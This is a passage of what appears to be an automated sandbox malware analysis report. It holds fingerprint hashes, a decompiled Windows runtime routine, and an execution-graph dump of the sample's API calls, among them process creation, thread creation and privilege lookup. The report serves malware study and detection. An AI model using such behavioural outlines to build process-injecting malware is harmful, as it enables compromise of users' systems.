                                                                                                            • Opcode Fuzzy Hash: c17cd4270bd218e317d9f58664e68725ac3e89e2abf0afbee1502e96da568422
                                                                                                            • Instruction Fuzzy Hash: 9E90026120504943D14065999448A464105E7D0249F51D021A1454595DC6759851B271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: af4192908fcd2100fe37d5b877be79c97b32cacded34e169afe11dc7cfa86593
                                                                                                            • Instruction ID: cffbb734da298a2266bd54190414b1835f7f70ec8564edf228e149a9588f7575
                                                                                                            • Opcode Fuzzy Hash: af4192908fcd2100fe37d5b877be79c97b32cacded34e169afe11dc7cfa86593
                                                                                                            • Instruction Fuzzy Hash: 7590027520504943D54065999844AC74105E7D0349F51D421A081459CDC6949861B261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09c1fe0dd5bac9c886a4d5358d57d83d17b5d35877bc2c20565cf7732b54a56e
                                                                                                            • Instruction ID: 89f7516487d7762606b56c806cbc6cd73ae77db570ed4682fdfb0f6ea0dbd92f
                                                                                                            • Opcode Fuzzy Hash: 09c1fe0dd5bac9c886a4d5358d57d83d17b5d35877bc2c20565cf7732b54a56e
                                                                                                            • Instruction Fuzzy Hash: B990027160500D03D190719984547864105E7D0345F51C021A0414654DC7959A5577E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86ae913df6d77abfb2e9ea49d2b468196849204d75611d6d3b8e4edd9b5a871b
                                                                                                            • Instruction ID: 94364e72c99e3a180a1da5a041251af07cd131f63b66f68262cc85cfbf90f3ec
                                                                                                            • Opcode Fuzzy Hash: 86ae913df6d77abfb2e9ea49d2b468196849204d75611d6d3b8e4edd9b5a871b
                                                                                                            • Instruction Fuzzy Hash: 9390027120504D43D18071998444A864115E7D0349F51C021A0454694DD6659D55B7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a5155796e47ea1dc498eaf9935ecf5b1366dfb5f7b70cdd3b4828ebd95aed8d3
                                                                                                            • Instruction ID: 632fb844ab37de993d9c7df3153beaced87bdd96ed1b7c36558f1939d1dd066b
                                                                                                            • Opcode Fuzzy Hash: a5155796e47ea1dc498eaf9935ecf5b1366dfb5f7b70cdd3b4828ebd95aed8d3
                                                                                                            • Instruction Fuzzy Hash: 0790027120100D43D14061998444B864105E7E0345F51C026A0514654DC655D8517661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                            • Instruction ID: d6b34cff932920ecfd9f6527340fe22b29f9dbabf2513dcb5897910a59f4b893
                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E010FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                            				void* _t7;
                                                                                                            				intOrPtr _t9;
                                                                                                            				intOrPtr _t10;
                                                                                                            				intOrPtr* _t12;
                                                                                                            				intOrPtr* _t13;
                                                                                                            				intOrPtr _t14;
                                                                                                            				intOrPtr* _t15;
                                                                                                            
                                                                                                            				_t13 = __edx;
                                                                                                            				_push(_a4);
                                                                                                            				_t14 =  *[fs:0x18];
                                                                                                            				_t15 = _t12;
                                                                                                            				_t7 = E010ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                            				_push(_t13);
                                                                                                            				E010F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                            				_t9 =  *_t15;
                                                                                                            				if(_t9 == 0xffffffff) {
                                                                                                            					_t10 = 0;
                                                                                                            				} else {
                                                                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                            				}
                                                                                                            				_push(_t10);
                                                                                                            				_push(_t15);
                                                                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                            				return E010F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010FFDFA
                                                                                                            Strings
                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010FFE01
                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010FFE2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                            • API String ID: 885266447-3903918235
                                                                                                            • Opcode ID: c2e7233d0589dfec87de1c6c6fcf5942a1d0fd9e2054646c0075d399a49cf934
                                                                                                            • Instruction ID: 63e07f5510624f9f200f489e5326c5cbb88ff453f225260973bf3e80e5759ee3
                                                                                                            • Opcode Fuzzy Hash: c2e7233d0589dfec87de1c6c6fcf5942a1d0fd9e2054646c0075d399a49cf934
                                                                                                            • Instruction Fuzzy Hash: 83F0F633640202BFE7201A85DC06F63BF5AEB44B30F140318F7A85A5D1EA62F82086F0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:7.2%
                                                                                                            Dynamic/Decrypted Code Coverage:1.3%
                                                                                                            Signature Coverage:1%
                                                                                                            Total number of Nodes:1248
                                                                                                            Total number of Limit Nodes:134
33987->33848 33988 f46057 33989 f4bef0 2 API calls 33988->33989 33990 f46068 33989->33990 33990->33848 33991->33987 33991->33988 33992 f460a3 33991->33992 33993 f4bef0 2 API calls 33992->33993 33994 f460a8 33993->33994 33994->33848 34095 f4abf0 33995->34095 33997 f4ad74 33998 f4abf0 LdrLoadDll 33997->33998 33999 f4ad7d 33998->33999 34000 f4abf0 LdrLoadDll 33999->34000 34001 f4ad86 34000->34001 34002 f4abf0 LdrLoadDll 34001->34002 34003 f4ad8f 34002->34003 34004 f4abf0 LdrLoadDll 34003->34004 34005 f4ad98 34004->34005 34006 f4abf0 LdrLoadDll 34005->34006 34007 f4ada1 34006->34007 34008 f4abf0 LdrLoadDll 34007->34008 34009 f4adad 34008->34009 34010 f4abf0 LdrLoadDll 34009->34010 34011 f4adb6 34010->34011 34012 f4abf0 LdrLoadDll 34011->34012 34013 f4adbf 34012->34013 34014 f4abf0 LdrLoadDll 34013->34014 34015 f4adc8 34014->34015 34016 f4abf0 LdrLoadDll 34015->34016 34017 f4add1 34016->34017 34018 f4abf0 LdrLoadDll 34017->34018 34019 f4adda 34018->34019 34020 f4abf0 LdrLoadDll 34019->34020 34021 f4ade6 34020->34021 34022 f4abf0 LdrLoadDll 34021->34022 34023 f4adef 34022->34023 34024 f4abf0 LdrLoadDll 34023->34024 34025 f4adf8 34024->34025 34026 f4abf0 LdrLoadDll 34025->34026 34027 f4ae01 34026->34027 34028 f4abf0 LdrLoadDll 34027->34028 34029 f4ae0a 34028->34029 34030 f4abf0 LdrLoadDll 34029->34030 34031 f4ae13 34030->34031 34032 f4abf0 LdrLoadDll 34031->34032 34033 f4ae1f 34032->34033 34034 f4abf0 LdrLoadDll 34033->34034 34035 f4ae28 34034->34035 34036 f4abf0 LdrLoadDll 34035->34036 34037 f4ae31 34036->34037 34038 f4abf0 LdrLoadDll 34037->34038 34039 f4ae3a 34038->34039 34040 f4abf0 LdrLoadDll 34039->34040 34041 f4ae43 34040->34041 34042 f4abf0 LdrLoadDll 34041->34042 34043 f4ae4c 34042->34043 34044 f4abf0 LdrLoadDll 34043->34044 34045 f4ae58 34044->34045 34046 f4abf0 LdrLoadDll 34045->34046 34047 f4ae61 34046->34047 34048 f4abf0 LdrLoadDll 34047->34048 34049 f4ae6a 34048->34049 34050 f4abf0 LdrLoadDll 34049->34050 34051 f4ae73 34050->34051 34052 f4abf0 LdrLoadDll 
34051->34052 34053 f4ae7c 34052->34053 34054 f4abf0 LdrLoadDll 34053->34054 34055 f4ae85 34054->34055 34056 f4abf0 LdrLoadDll 34055->34056 34057 f4ae91 34056->34057 34058 f4abf0 LdrLoadDll 34057->34058 34059 f4ae9a 34058->34059 34060 f4abf0 LdrLoadDll 34059->34060 34061 f4aea3 34060->34061 34062 f4abf0 LdrLoadDll 34061->34062 34063 f4aeac 34062->34063 34064 f4abf0 LdrLoadDll 34063->34064 34065 f4aeb5 34064->34065 34066 f4abf0 LdrLoadDll 34065->34066 34067 f4aebe 34066->34067 34068 f4abf0 LdrLoadDll 34067->34068 34069 f4aeca 34068->34069 34070 f4abf0 LdrLoadDll 34069->34070 34071 f4aed3 34070->34071 34072 f4abf0 LdrLoadDll 34071->34072 34073 f4aedc 34072->34073 34073->33852 34075 f4af70 LdrLoadDll 34074->34075 34076 f49e9c 34075->34076 34101 51e9860 LdrInitializeThunk 34076->34101 34077 f49eb3 34077->33784 34079->33849 34081 f4d0b6 34080->34081 34082 f4d0b0 34080->34082 34083 f4c0c0 2 API calls 34081->34083 34082->33956 34084 f4d0dc 34083->34084 34084->33956 34086 f4d140 34085->34086 34087 f4c0c0 2 API calls 34086->34087 34088 f4d19d 34086->34088 34089 f4d17a 34087->34089 34088->33964 34090 f4bef0 2 API calls 34089->34090 34090->34088 34092 f44f94 34091->34092 34093 f4bef0 2 API calls 34091->34093 34092->33975 34093->34092 34094->33961 34096 f4ac0b 34095->34096 34097 f45ab0 LdrLoadDll 34096->34097 34098 f4ac2b 34097->34098 34099 f45ab0 LdrLoadDll 34098->34099 34100 f4acdf 34098->34100 34099->34100 34100->33997 34100->34100 34101->34077 34103 51e968f LdrInitializeThunk 34102->34103 34104 51e9681 34102->34104 34103->33858 34104->33858 34106 f4af70 LdrLoadDll 34105->34106 34107 f4a64c RtlFreeHeap 34106->34107 34107->33862 34109 f37230 34108->34109 34110 f3722b 34108->34110 34111 f4be70 2 API calls 34109->34111 34110->33792 34118 f37255 34111->34118 34112 f372b8 34112->33792 34113 f49e80 2 API calls 34113->34118 34114 f372be 34115 f372e4 34114->34115 34117 f4a580 2 API calls 34114->34117 34115->33792 34119 f372d5 34117->34119 34118->34112 34118->34113 34118->34114 34120 
f4be70 2 API calls 34118->34120 34124 f4a580 34118->34124 34119->33792 34120->34118 34122 f4a580 2 API calls 34121->34122 34123 f374fe 34122->34123 34123->33748 34125 f4af70 LdrLoadDll 34124->34125 34126 f4a59c 34125->34126 34129 51e96e0 LdrInitializeThunk 34126->34129 34127 f4a5b3 34127->34118 34129->34127 34131 f4b633 34130->34131 34132 f3a150 LdrLoadDll 34131->34132 34133 f3907a 34132->34133 34133->33755 34135 f3a4c3 34134->34135 34137 f3a540 34135->34137 34150 f49c50 LdrLoadDll 34135->34150 34137->33762 34139 f4af70 LdrLoadDll 34138->34139 34140 f3d5bb 34139->34140 34140->33765 34141 f4a790 34140->34141 34142 f4af70 LdrLoadDll 34141->34142 34143 f4a7af LookupPrivilegeValueW 34142->34143 34143->33767 34145 f4a22e 34144->34145 34146 f4af70 LdrLoadDll 34145->34146 34147 f4a23c 34146->34147 34151 51e9910 LdrInitializeThunk 34147->34151 34148 f4a25b 34148->33768 34150->34137 34151->34148 34153 f3a647 34152->34153 34154 f3a4a0 LdrLoadDll 34153->34154 34155 f3a676 34154->34155 34155->33707 34157 f3a394 34156->34157 34212 f49c50 LdrLoadDll 34157->34212 34159 f3a3ce 34159->33709 34161 f3d7ac 34160->34161 34162 f3a620 LdrLoadDll 34161->34162 34163 f3d7be 34162->34163 34213 f3d690 34163->34213 34166 f3d7f1 34170 f4a450 2 API calls 34166->34170 34171 f3d802 34166->34171 34167 f3d7d9 34168 f4a450 2 API calls 34167->34168 34169 f3d7e4 34167->34169 34168->34169 34169->33713 34170->34171 34171->33713 34173 f3b4f6 34172->34173 34174 f3b500 34172->34174 34173->33721 34175 f3a4a0 LdrLoadDll 34174->34175 34176 f3b571 34175->34176 34177 f3a370 LdrLoadDll 34176->34177 34178 f3b585 34177->34178 34179 f3b5a8 34178->34179 34180 f3a4a0 LdrLoadDll 34178->34180 34179->33721 34181 f3b5c4 34180->34181 34182 f456b0 8 API calls 34181->34182 34183 f3b619 34182->34183 34183->33721 34185 f3c076 34184->34185 34186 f3a4a0 LdrLoadDll 34185->34186 34187 f3c08a 34186->34187 34232 f3bd40 34187->34232 34189 f3859c 34210 f3b630 LdrLoadDll 34189->34210 34262 f3da40 34190->34262 34192 f38441 34192->33733 
34193 f38243 34193->34192 34267 f45000 34193->34267 34195 f382a2 34195->34192 34270 f37fe0 34195->34270 34198 f4d0a0 2 API calls 34199 f382e9 34198->34199 34200 f4d1d0 3 API calls 34199->34200 34202 f382fe 34200->34202 34201 f37220 4 API calls 34207 f38350 34201->34207 34202->34207 34345 f33660 10 API calls 34202->34345 34207->34192 34207->34201 34208 f374e0 2 API calls 34207->34208 34275 f3b210 34207->34275 34325 f3d9e0 34207->34325 34329 f3d4c0 34207->34329 34208->34207 34209->33711 34210->33726 34211->33731 34212->34159 34214 f3d6aa 34213->34214 34215 f3d760 34213->34215 34216 f3a4a0 LdrLoadDll 34214->34216 34215->34166 34215->34167 34217 f3d6cc 34216->34217 34223 f49f00 34217->34223 34219 f3d70e 34226 f49f40 34219->34226 34222 f4a450 2 API calls 34222->34215 34224 f4af70 LdrLoadDll 34223->34224 34225 f49f1c 34223->34225 34224->34225 34225->34219 34227 f4af70 LdrLoadDll 34226->34227 34228 f49f5c 34227->34228 34231 51e9fe0 LdrInitializeThunk 34228->34231 34229 f3d754 34229->34222 34231->34229 34233 f3bd57 34232->34233 34241 f3da80 34233->34241 34237 f3bdcb 34238 f3bdd2 34237->34238 34253 f4a260 LdrLoadDll 34237->34253 34238->34189 34240 f3bde5 34240->34189 34242 f3daa5 34241->34242 34254 f37520 34242->34254 34244 f3dac9 34245 f456b0 8 API calls 34244->34245 34246 f3bd9f 34244->34246 34248 f4bef0 2 API calls 34244->34248 34261 f3d8c0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34244->34261 34245->34244 34249 f4a6a0 34246->34249 34248->34244 34250 f4af70 LdrLoadDll 34249->34250 34251 f4a6bf CreateProcessInternalW 34250->34251 34251->34237 34253->34240 34255 f3761f 34254->34255 34256 f37535 34254->34256 34255->34244 34256->34255 34257 f456b0 8 API calls 34256->34257 34258 f375a2 34257->34258 34259 f4bef0 2 API calls 34258->34259 34260 f375c9 34258->34260 34259->34260 34260->34244 34261->34244 34263 f45ab0 LdrLoadDll 34262->34263 34264 f3da5f 34263->34264 34265 f3da66 SetErrorMode 34264->34265 34266 f3da6d 34264->34266 34265->34266 34266->34193 34346 f3d810 
34267->34346 34269 f45026 34269->34195 34271 f4be70 2 API calls 34270->34271 34274 f38005 34271->34274 34272 f38220 34272->34198 34274->34272 34365 f49840 34274->34365 34276 f3b22f 34275->34276 34277 f3b229 34275->34277 34422 f38c30 34276->34422 34413 f3d2d0 34277->34413 34280 f3b23c 34281 f3b4d2 34280->34281 34282 f4d1d0 3 API calls 34280->34282 34281->34207 34283 f3b258 34282->34283 34284 f3b26c 34283->34284 34285 f3d9e0 2 API calls 34283->34285 34431 f49cd0 34284->34431 34285->34284 34288 f3b3a0 34447 f3b1b0 LdrLoadDll LdrInitializeThunk 34288->34447 34289 f49ec0 2 API calls 34290 f3b2ea 34289->34290 34290->34288 34296 f3b2f6 34290->34296 34292 f3b3bf 34293 f3b3c7 34292->34293 34448 f3b120 LdrLoadDll NtClose LdrInitializeThunk 34292->34448 34294 f4a450 2 API calls 34293->34294 34297 f3b3d1 34294->34297 34296->34281 34299 f3b349 34296->34299 34302 f49fd0 2 API calls 34296->34302 34297->34207 34298 f3b3e9 34298->34293 34301 f3b3f0 34298->34301 34300 f4a450 2 API calls 34299->34300 34303 f3b366 34300->34303 34304 f3b408 34301->34304 34449 f3b0a0 LdrLoadDll LdrInitializeThunk 34301->34449 34302->34299 34434 f492f0 34303->34434 34450 f49d50 LdrLoadDll 34304->34450 34308 f3b37d 34308->34281 34437 f37690 34308->34437 34309 f3b41c 34451 f3af20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34309->34451 34312 f3b440 34314 f3b48d 34312->34314 34452 f49d80 LdrLoadDll 34312->34452 34454 f49de0 LdrLoadDll 34314->34454 34317 f3b45e 34317->34314 34453 f49e10 LdrLoadDll 34317->34453 34318 f3b49b 34319 f4a450 2 API calls 34318->34319 34320 f3b4a5 34319->34320 34322 f4a450 2 API calls 34320->34322 34323 f3b4af 34322->34323 34323->34281 34324 f37690 3 API calls 34323->34324 34324->34281 34326 f3d9f3 34325->34326 34528 f49e50 34326->34528 34330 f3d4d0 34329->34330 34332 f3d508 34329->34332 34330->34332 34340 f3d4ff 34330->34340 34534 f3c340 34330->34534 34331 f3d523 34569 f3d1f0 34331->34569 34332->34331 34344 f3d558 34332->34344 34591 f3d270 11 API calls 34332->34591 
34339 f3d567 34339->34207 34549 f3d320 34340->34549 34343 f456b0 8 API calls 34343->34344 34592 f34750 28 API calls 34344->34592 34345->34207 34347 f3d82d 34346->34347 34353 f49f80 34347->34353 34350 f3d875 34350->34269 34354 f4af70 LdrLoadDll 34353->34354 34355 f49f9c 34354->34355 34363 51e99a0 LdrInitializeThunk 34355->34363 34356 f3d86e 34356->34350 34358 f49fd0 34356->34358 34359 f4af70 LdrLoadDll 34358->34359 34360 f49fec 34359->34360 34364 51e9780 LdrInitializeThunk 34360->34364 34361 f3d89e 34361->34269 34363->34356 34364->34361 34366 f4c0c0 2 API calls 34365->34366 34367 f49857 34366->34367 34386 f38770 34367->34386 34369 f49872 34370 f498b0 34369->34370 34371 f49899 34369->34371 34374 f4be70 2 API calls 34370->34374 34372 f4bef0 2 API calls 34371->34372 34373 f498a6 34372->34373 34373->34272 34375 f498ea 34374->34375 34376 f4be70 2 API calls 34375->34376 34377 f49903 34376->34377 34383 f49ba4 34377->34383 34392 f4beb0 LdrLoadDll 34377->34392 34379 f49b89 34380 f49b90 34379->34380 34379->34383 34381 f4bef0 2 API calls 34380->34381 34382 f49b9a 34381->34382 34382->34272 34384 f4bef0 2 API calls 34383->34384 34385 f49bf9 34384->34385 34385->34272 34387 f38795 34386->34387 34388 f3a150 LdrLoadDll 34387->34388 34389 f387c8 34388->34389 34391 f387ed 34389->34391 34393 f3b950 34389->34393 34391->34369 34392->34379 34394 f3b97c 34393->34394 34395 f4a1a0 LdrLoadDll 34394->34395 34396 f3b995 34395->34396 34397 f3b99c 34396->34397 34404 f4a1e0 34396->34404 34397->34391 34401 f3b9d7 34402 f4a450 2 API calls 34401->34402 34403 f3b9fa 34402->34403 34403->34391 34405 f4af70 LdrLoadDll 34404->34405 34406 f4a1fc 34405->34406 34412 51e9710 LdrInitializeThunk 34406->34412 34407 f3b9bf 34407->34397 34409 f4a7d0 34407->34409 34410 f4af70 LdrLoadDll 34409->34410 34411 f4a7ef 34410->34411 34411->34401 34412->34407 34455 f3c3c0 34413->34455 34415 f3d2e7 34421 f3d300 34415->34421 34468 f34000 34415->34468 34417 f4c0c0 2 API calls 34419 f3d30e 34417->34419 34418 f3d2fa 34495 f49170 
34418->34495 34419->34276 34421->34417 34423 f38c4b 34422->34423 34424 f3d690 3 API calls 34423->34424 34430 f38d6b 34423->34430 34425 f38d4c 34424->34425 34426 f38d7a 34425->34426 34427 f4a450 2 API calls 34425->34427 34429 f38d61 34425->34429 34426->34280 34427->34429 34527 f36290 LdrLoadDll 34429->34527 34430->34280 34432 f4af70 LdrLoadDll 34431->34432 34433 f3b2c0 34432->34433 34433->34281 34433->34288 34433->34289 34435 f3d9e0 2 API calls 34434->34435 34436 f49322 34435->34436 34436->34308 34438 f376a8 34437->34438 34439 f3a150 LdrLoadDll 34438->34439 34440 f376c3 34439->34440 34441 f45ab0 LdrLoadDll 34440->34441 34442 f376d3 34441->34442 34443 f3770d 34442->34443 34444 f376dc PostThreadMessageW 34442->34444 34443->34207 34444->34443 34445 f376f0 34444->34445 34446 f376fa PostThreadMessageW 34445->34446 34446->34443 34447->34292 34448->34298 34449->34304 34450->34309 34451->34312 34452->34317 34453->34314 34454->34318 34456 f3c3f3 34455->34456 34500 f3a760 34456->34500 34458 f3c405 34504 f3a8d0 34458->34504 34460 f3c423 34461 f3a8d0 LdrLoadDll 34460->34461 34462 f3c439 34461->34462 34463 f3d810 3 API calls 34462->34463 34464 f3c45d 34463->34464 34465 f3c464 34464->34465 34466 f4c100 2 API calls 34464->34466 34465->34415 34467 f3c474 34466->34467 34467->34415 34469 f3402c 34468->34469 34470 f3b950 3 API calls 34469->34470 34472 f34103 34470->34472 34471 f34695 34471->34418 34472->34471 34507 f4c140 34472->34507 34474 f3416e 34475 f3a4a0 LdrLoadDll 34474->34475 34476 f342f4 34475->34476 34477 f3a4a0 LdrLoadDll 34476->34477 34478 f34318 34477->34478 34511 f3ba10 34478->34511 34482 f343b3 34483 f34479 34482->34483 34484 f3ba10 2 API calls 34482->34484 34486 f4be70 2 API calls 34483->34486 34485 f34452 34484->34485 34485->34483 34488 f4a0e0 2 API calls 34485->34488 34487 f344e6 34486->34487 34489 f4be70 2 API calls 34487->34489 34488->34483 34490 f344ff 34489->34490 34490->34471 34491 f3a4a0 LdrLoadDll 34490->34491 34492 f34547 34491->34492 34493 f3a370 LdrLoadDll 
34492->34493 34494 f345f9 34493->34494 34494->34418 34496 f45ab0 LdrLoadDll 34495->34496 34497 f49191 34496->34497 34498 f491b7 34497->34498 34499 f491a4 CreateThread 34497->34499 34498->34421 34499->34421 34501 f3a787 34500->34501 34502 f3a4a0 LdrLoadDll 34501->34502 34503 f3a7c3 34502->34503 34503->34458 34505 f3a4a0 LdrLoadDll 34504->34505 34506 f3a8e9 34505->34506 34506->34460 34508 f4c14d 34507->34508 34509 f45ab0 LdrLoadDll 34508->34509 34510 f4c160 34509->34510 34510->34474 34512 f3ba35 34511->34512 34520 f4a050 34512->34520 34515 f4a0e0 34516 f4af70 LdrLoadDll 34515->34516 34517 f4a0fc 34516->34517 34526 51e9650 LdrInitializeThunk 34517->34526 34518 f4a11b 34518->34482 34521 f4af70 LdrLoadDll 34520->34521 34522 f4a06c 34521->34522 34525 51e96d0 LdrInitializeThunk 34522->34525 34523 f3438c 34523->34482 34523->34515 34525->34523 34526->34518 34527->34430 34529 f4af70 LdrLoadDll 34528->34529 34530 f49e6c 34529->34530 34533 51e9840 LdrInitializeThunk 34530->34533 34531 f3da1e 34531->34207 34533->34531 34535 f3c3b5 34534->34535 34536 f3c350 34534->34536 34535->34340 34536->34535 34593 f3d620 34536->34593 34538 f3c360 34539 f456b0 8 API calls 34538->34539 34540 f3c371 34539->34540 34541 f456b0 8 API calls 34540->34541 34542 f3c37c 34541->34542 34543 f3c38a 34542->34543 34601 f3be00 34542->34601 34545 f456b0 8 API calls 34543->34545 34546 f3c398 34545->34546 34547 f456b0 8 API calls 34546->34547 34548 f3c3a3 34547->34548 34548->34340 34550 f3d350 34549->34550 34652 f449d0 34550->34652 34552 f3d391 34690 f436c0 34552->34690 34554 f3d397 34726 f408e0 34554->34726 34556 f3d39d 34749 f427b0 34556->34749 34558 f3d3a5 34781 f439e0 34558->34781 34562 f3d3b1 34815 f44050 34562->34815 34564 f3d3b7 34841 f3f120 34564->34841 34566 f3d3cf 34852 f3f2f0 34566->34852 34570 f3d208 34569->34570 34574 f3d259 34569->34574 34571 f3f6d0 8 API calls 34570->34571 34570->34574 34572 f3d243 34571->34572 34572->34574 35066 f3f920 11 API calls 34572->35066 34574->34339 34575 f3d030 
34574->34575 34576 f3d04c 34575->34576 34581 f3d12b 34575->34581 34579 f4a450 2 API calls 34576->34579 34576->34581 34577 f3d1c1 34578 f3d1de 34577->34578 34580 f456b0 8 API calls 34577->34580 34578->34343 34578->34344 34582 f3d067 34579->34582 34580->34578 34581->34577 35067 f3bb80 34581->35067 34585 f3bb80 4 API calls 34582->34585 34584 f3d19b 34584->34577 34587 f3be00 5 API calls 34584->34587 34586 f3d09f 34585->34586 34588 f3a4a0 LdrLoadDll 34586->34588 34587->34577 34589 f3d0b0 34588->34589 34590 f3a4a0 LdrLoadDll 34589->34590 34590->34581 34591->34331 34592->34339 34594 f4a1a0 LdrLoadDll 34593->34594 34595 f3d647 34594->34595 34596 f3d64e 34595->34596 34597 f4a1e0 2 API calls 34595->34597 34596->34538 34598 f3d66c 34597->34598 34599 f4a450 2 API calls 34598->34599 34600 f3d678 34599->34600 34600->34538 34602 f3be25 34601->34602 34603 f3be33 34602->34603 34604 f3be47 34602->34604 34605 f3a4a0 LdrLoadDll 34603->34605 34606 f3a4a0 LdrLoadDll 34604->34606 34608 f3be42 34605->34608 34607 f3be56 34606->34607 34610 f3b950 3 API calls 34607->34610 34609 f3a4a0 LdrLoadDll 34608->34609 34611 f3c044 34608->34611 34612 f3beb6 34609->34612 34610->34608 34611->34543 34613 f3a4a0 LdrLoadDll 34612->34613 34614 f3bee7 34613->34614 34615 f3bfe0 34614->34615 34617 f3ba10 2 API calls 34614->34617 34616 f3ba10 2 API calls 34615->34616 34618 f3bff9 34616->34618 34619 f3bf0a 34617->34619 34642 f3bac0 34618->34642 34621 f3bf15 34619->34621 34622 f3bfbf 34619->34622 34623 f4a450 2 API calls 34621->34623 34626 f3a4a0 LdrLoadDll 34622->34626 34624 f3bf1f 34623->34624 34628 f3a4a0 LdrLoadDll 34624->34628 34625 f4a450 2 API calls 34625->34611 34626->34615 34627 f3c009 34627->34625 34629 f3bf43 34628->34629 34630 f3ba10 2 API calls 34629->34630 34631 f3bf59 34630->34631 34632 f4a450 2 API calls 34631->34632 34633 f3bf63 34632->34633 34634 f3a4a0 LdrLoadDll 34633->34634 34635 f3bf87 34634->34635 34636 f3ba10 2 API calls 34635->34636 34637 f3bf9d 34636->34637 34638 f3bac0 2 API calls 
